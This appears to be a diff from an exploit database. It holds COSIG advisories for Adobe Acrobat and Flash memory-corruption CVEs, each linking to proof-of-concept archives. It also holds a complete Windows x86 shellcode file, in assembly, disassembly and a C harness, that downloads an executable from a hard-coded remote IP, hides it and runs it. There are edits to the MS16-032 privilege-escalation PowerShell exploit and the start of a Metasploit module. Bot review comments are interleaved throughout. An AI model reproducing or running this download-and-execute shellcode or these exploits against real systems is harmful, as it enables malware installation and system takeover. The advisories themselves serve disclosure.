Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40096.zip
####################################################################################


@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4203
# COSIG-2016-28
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40097.zip
####################################################################################


@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4208
# COSIG-2016-27
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40098.zip
####################################################################################
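Review bot: CVE-2016-4208 (COSIG-2016-27) is described with exactly the same technical-details text as COSIG-2016-28 above and the three Acrobat advisories that follow, so nothing in this file identifies what is distinct about this CVE; add at least the affected font table or field and the crash type, or cross-reference the part of the COSIG PDF that does. The "4) POC" section consists only of two download links; a hash of the PoC PDF would let readers confirm they are analysing the right sample.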


@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4207
# COSIG-2016-26
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40099.zip
####################################################################################


@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4206
# COSIG-2016-25
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40100.zip
####################################################################################


@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4201
# COSIG-2016-24
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40101.zip
####################################################################################


@ -0,0 +1,59 @@
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4179
# COSIG-2016-23
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-05-14: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains “DefineBitsJPEG2” invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40102.zip
####################################################################################
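Review bot: the timeline heading "2) Rapport de Coordination" is in French while the table of contents above it says "2) Report Timeline" and the other COSIG advisories use the English heading; rename it for consistency. The introduction also carries a stray "[7]" footnote marker copied from Wikipedia, and "4) POC:" has a trailing colon the ToC entry lacks. On substance, "which contains "DefineBitsJPEG2" invalid data" names the tag but not which field of it (image data, alpha data, or the length field) triggers the corruption.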


@ -0,0 +1,59 @@
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4175
# COSIG-2016-22
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains DefineSprite invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40103.zip
####################################################################################


@ -0,0 +1,57 @@
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4177
# COSIG-2016-21
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains SceneAndFrameData invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40104.zip
###############################################################################
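Review bot: the timeline entry reads "Francis Provencher du COSIG of COSIG", a doubled affiliation left over from a partial translation; the "# Date: 12 juillet 2016" and "# Website: https://cosig.gouv.qc.ca/avis/" header lines are likewise still in French while the body is English (the other COSIG entries use "July 12, 2016" and "/en/advisory/"). The "[7]" in the introduction is a leftover Wikipedia footnote marker, and the closing separator line is shorter than the opening one.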


@ -0,0 +1,57 @@
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4176
# COSIG-2016-20
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains TAG invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40105.zip
###############################################################################
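Review bot: "which contains TAG invalid data" in section 3 identifies nothing, since every SWF record is a tag; please name the tag code or tag type, as the companion advisories do with DefineSprite, DefineBitsJPEG2 and SceneAndFrameData, so the CVE-2016-4176 entry can be matched against the APSB16-25 bulletin. The same French header lines and the doubled "du COSIG of COSIG" affiliation noted on the COSIG-2016-21 file appear here as well.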

platforms/win32/shellcode/40094.c Executable file

@ -0,0 +1,432 @@
/*
Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode
Date : 12-07-2016
Author : Roziul Hasan Khan Shifat
Tested on: Windows 7 x86
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx
00000023 <count>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <count>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <count>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <count>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 31 f6 xor %esi,%esi
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 c0 xor %eax,%eax
53: 50 push %eax
54: 68 61 72 79 41 push $0x41797261
59: 68 4c 69 62 72 push $0x7262694c
5e: 68 4c 6f 61 64 push $0x64616f4c
63: 54 push %esp
64: 51 push %ecx
65: ff d2 call *%edx
67: 83 c4 0c add $0xc,%esp
6a: 31 c9 xor %ecx,%ecx
6c: 68 6c 6c 41 41 push $0x41416c6c
71: 88 4c 24 02 mov %cl,0x2(%esp)
75: 68 6f 6e 2e 64 push $0x642e6e6f
7a: 68 75 72 6c 6d push $0x6d6c7275
7f: 54 push %esp
80: ff d0 call *%eax
82: 83 c4 0c add $0xc,%esp
85: 31 c9 xor %ecx,%ecx
87: 68 65 41 42 42 push $0x42424165
8c: 88 4c 24 02 mov %cl,0x2(%esp)
90: 68 6f 46 69 6c push $0x6c69466f
95: 68 6f 61 64 54 push $0x5464616f
9a: 68 6f 77 6e 6c push $0x6c6e776f
9f: 68 55 52 4c 44 push $0x444c5255
a4: 54 push %esp
a5: 50 push %eax
a6: ff d6 call *%esi
a8: 83 c4 14 add $0x14,%esp
ab: 50 push %eax
000000ac <download>:
ac: 58 pop %eax
ad: 31 c9 xor %ecx,%ecx
af: 51 push %ecx
b0: 68 2e 65 78 65 push $0x6578652e
b5: 68 6d 70 6c 65 push $0x656c706d
ba: 68 30 2f 73 61 push $0x61732f30
bf: 68 36 2e 31 33 push $0x33312e36
c4: 68 36 38 2e 38 push $0x382e3836
c9: 68 39 32 2e 31 push $0x312e3239
ce: 68 3a 2f 2f 31 push $0x312f2f3a
d3: 68 68 74 74 70 push $0x70747468
d8: 54 push %esp
d9: 59 pop %ecx
da: 31 db xor %ebx,%ebx
dc: 53 push %ebx
dd: 68 2e 65 78 65 push $0x6578652e
e2: 68 70 79 6c 64 push $0x646c7970
e7: 54 push %esp
e8: 5b pop %ebx
e9: 31 d2 xor %edx,%edx
eb: 50 push %eax
ec: 52 push %edx
ed: 52 push %edx
ee: 53 push %ebx
ef: 51 push %ecx
f0: 52 push %edx
f1: ff d0 call *%eax
f3: 59 pop %ecx
f4: 83 c4 2c add $0x2c,%esp
f7: 31 d2 xor %edx,%edx
f9: 39 d0 cmp %edx,%eax
fb: 51 push %ecx
fc: 75 ae jne ac <download>
fe: 5a pop %edx
ff: 31 d2 xor %edx,%edx
101: 68 73 41 42 42 push $0x42424173
106: 88 54 24 02 mov %dl,0x2(%esp)
10a: 68 62 75 74 65 push $0x65747562
10f: 68 74 74 72 69 push $0x69727474
114: 68 69 6c 65 41 push $0x41656c69
119: 68 53 65 74 46 push $0x46746553
11e: 54 push %esp
11f: 57 push %edi
120: ff d6 call *%esi
122: 83 c4 14 add $0x14,%esp
125: 31 c9 xor %ecx,%ecx
127: 51 push %ecx
128: 68 2e 65 78 65 push $0x6578652e
12d: 68 70 79 6c 64 push $0x646c7970
132: 54 push %esp
133: 59 pop %ecx
134: 31 d2 xor %edx,%edx
136: 83 c2 02 add $0x2,%edx
139: 52 push %edx
13a: 51 push %ecx
13b: ff d0 call *%eax
13d: 83 c4 08 add $0x8,%esp
140: 31 c9 xor %ecx,%ecx
142: 68 78 65 63 41 push $0x41636578
147: 88 4c 24 03 mov %cl,0x3(%esp)
14b: 68 57 69 6e 45 push $0x456e6957
150: 54 push %esp
151: 57 push %edi
152: ff d6 call *%esi
154: 83 c4 08 add $0x8,%esp
157: 31 c9 xor %ecx,%ecx
159: 51 push %ecx
15a: 68 2e 65 78 65 push $0x6578652e
15f: 68 70 79 6c 64 push $0x646c7970
164: 54 push %esp
165: 59 pop %ecx
166: 31 d2 xor %edx,%edx
168: 52 push %edx
169: 51 push %ecx
16a: ff d0 call *%eax
16c: 83 c4 08 add $0x8,%esp
16f: 31 c9 xor %ecx,%ecx
171: 68 65 73 73 41 push $0x41737365
176: 88 4c 24 03 mov %cl,0x3(%esp)
17a: 68 50 72 6f 63 push $0x636f7250
17f: 68 45 78 69 74 push $0x74697845
184: 54 push %esp
185: 57 push %edi
186: ff d6 call *%esi
188: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;Eax=PEB
mov eax,[eax+0xc] ;eax=PEB.Ldr
mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;ecx=kernel32.dll base address
;------------------------------------
mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew
add ebx,ecx ;ebx=PE HEADER
mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;------------------------------------------
xor edx,edx
count:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz count
cmp dword [eax+4],'rocA'
jnz count
cmp dword [eax+8],'ddre'
jnz count
;---------------------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4]
add edx,ecx ;edx=GetProcAddress()
;-----------------------------------------
xor esi,esi
mov esi,edx ;GetProcAddress()
mov edi,ecx ;kernel32.dll
;------------------------------------
;finding address of LoadLibraryA()
xor eax,eax
push eax
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ecx
call edx
;------------------------
add esp,12
;-----------------------------
;LoadLibraryA("urlmon.dll")
xor ecx,ecx
push 0x41416c6c
mov [esp+2],byte cl
push 0x642e6e6f
push 0x6d6c7275
push esp
call eax
;-----------------------
add esp,12
;-----------------------
;finding address of URLDownloadToFileA()
xor ecx,ecx
push 0x42424165
mov [esp+2],byte cl
push 0x6c69466f
push 0x5464616f
push 0x6c6e776f
push 0x444c5255
push esp
push eax
call esi
;------------------------
add esp,20
push eax
;---------------------------------------
;URLDownloadToFileA(NULL,url,save as,0,NULL)
download:
pop eax
xor ecx,ecx
push ecx
;-----------------------------
;change it to file url
push 0x6578652e
push 0x656c706d
push 0x61732f30
push 0x33312e36
push 0x382e3836
push 0x312e3239
push 0x312f2f3a
push 0x70747468
;-----------------------------------
push esp
pop ecx ;url http://192.168.86.130/sample.exe
xor ebx,ebx
push ebx
;------------------------
;save as (no need change it.if U want to change it,do it)
push 0x6578652e
push 0x646c7970
;-------------------------------
push esp ;pyld.exe
pop ebx ;save as
xor edx,edx
push eax
push edx
push edx
push ebx
push ecx
push edx
call eax
;-------------------------
pop ecx
add esp,44
xor edx,edx
cmp eax,edx
push ecx
jnz download ;if it fails to download , retry contineusly
;------------------
pop edx
;-----------------------
;Finding address of SetFileAttributesA()
xor edx,edx
push 0x42424173
mov [esp+2],byte dl
push 0x65747562
push 0x69727474
push 0x41656c69
push 0x46746553
push esp
push edi
call esi
;--------------------------------
add esp,20 ;U must adjust stack or it will crash
;--------------------
;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
push esp
pop ecx
xor edx,edx
add edx,2 ;FILE_ATTRIBUTE_HIDDEN
push edx
push ecx
call eax
;-------------------
add esp,8
;---------------------------
;finding address of WinExec()
xor ecx,ecx
push 0x41636578
mov [esp+3],byte cl
push 0x456e6957
push esp
push edi
call esi
;----------------------
add esp,8
;------------------------
;calling WinExec("pyld.exe",0)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
push esp
pop ecx
xor edx,edx
push edx
push ecx
call eax
;-------------------------
add esp,8
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
push esp
push edi
call esi
;--------------
call eax
*/
#include<stdio.h>
#include<string.h>
char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0";
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
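Review bot: the stack adjustment after the URLDownloadToFileA() call looks 4 bytes short: between "download:" and "call eax" the code pushes 9 dwords for the URL and 3 for the file name (48 bytes), the stdcall callee removes its own 5 arguments, "pop ecx" recovers the saved function pointer, and then only "add esp,44" runs, so the "jnz download" retry loop drifts the stack down 4 bytes per attempt and, as the comment says, retries "contineusly" (continuously) with no exit path. Two further points on the export resolver: it indexes AddressOfFunctions with the name-table counter (edx is incremented before each lodsd, so it is one past the matching name's index) and never reads AddressOfNameOrdinals, which only works where the ordinal table happens to line up and is why "Tested on: Windows 7 x86" is load-bearing, so document that as a portability limit; and the comment "DOS->e_flanew" should read e_lfanew. In the C harness, "main()" with an implicit int return type is not valid C99; write "int main(void)", and note that jumping into a "char" array placed in .data requires the data segment to be executable.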


@ -207,7 +207,7 @@ function Invoke-MS16-032 {
} }
function Get-SystemToken { function Get-SystemToken {
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
$CallResult = [Kernel32]::SuspendThread($hThread) $CallResult = [Kernel32]::SuspendThread($hThread)
if ($CallResult -ne 0) { if ($CallResult -ne 0) {
@ -278,8 +278,8 @@ function Invoke-MS16-032 {
$hThread = Get-ThreadHandle $hThread = Get-ThreadHandle
# If no thread handle is captured, the box is patched # If no thread handle is captured, the box is patched
if (!$hThread) { if ($hThread -eq 0) {
echo "[!] No valid thread handles were captured, exiting!`n" echo "[!] No valid thread handle was captured, exiting!`n"
Return Return
} else { } else {
echo "[?] Done, using thread handle: $hThread" echo "[?] Done, using thread handle: $hThread"
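Review bot: replacing "if (!$hThread)" with "if ($hThread -eq 0)" narrows the failure check: in PowerShell "$null -eq 0" evaluates to $false, so if Get-ThreadHandle returns nothing at all (no output rather than a zero IntPtr) the new condition no longer catches it and the script continues with an empty handle. Either keep the null test as well ("if (!$hThread -or $hThread -eq 0)") or confirm that every failure path in Get-ThreadHandle returns [IntPtr]::Zero. The message change to "No valid thread handle was captured" is fine.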
@ -288,7 +288,7 @@ function Invoke-MS16-032 {
# Get handle to SYSTEM access token # Get handle to SYSTEM access token
Get-SystemToken Get-SystemToken
# If we fail a check in Get-SystemToken, skip loop # If we fail a check in Get-SystemToken, exit
if ($SysTokenHandle -eq 0) { if ($SysTokenHandle -eq 0) {
Return Return
} }

platforms/windows/local/40107.rb Executable file

@ -0,0 +1,195 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload_generator'
require 'msf/core/exploit/powershell'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::File
